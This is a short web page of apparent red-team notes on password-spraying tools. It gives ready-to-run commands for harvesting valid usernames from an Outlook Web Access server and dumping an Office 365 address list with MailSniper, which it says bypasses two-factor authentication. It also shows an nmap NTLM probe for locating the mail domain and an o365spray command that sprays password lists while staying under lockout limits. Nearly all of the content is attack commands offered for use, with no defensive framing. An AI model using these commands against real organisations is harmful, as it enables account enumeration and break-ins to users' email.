Skip to content

Different Password Spraying tools and methods #

MailSniper1 #

  • Advantages
    • Invoke-UsernameHarvestOWA is very useful
    • Get-GlobalAddressList is awesome
      • bypasses 2FA in Office 365
      • Easily dump list from OWA & Office 365
1
2
Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt
Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName user2@domain.com -Password "[email protected]" -OutFile global-address-list.txt

Find OWA Domain #

NMAP #

1
nmap -p 443 -Pn -v mail.domain.com --script http-ntlm-info --script-args http-ntlm-info.root=/rpc/rpcproxy.dll

o365spray2 #

1
python3 o365spray.py --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com

Last update: May 12, 2021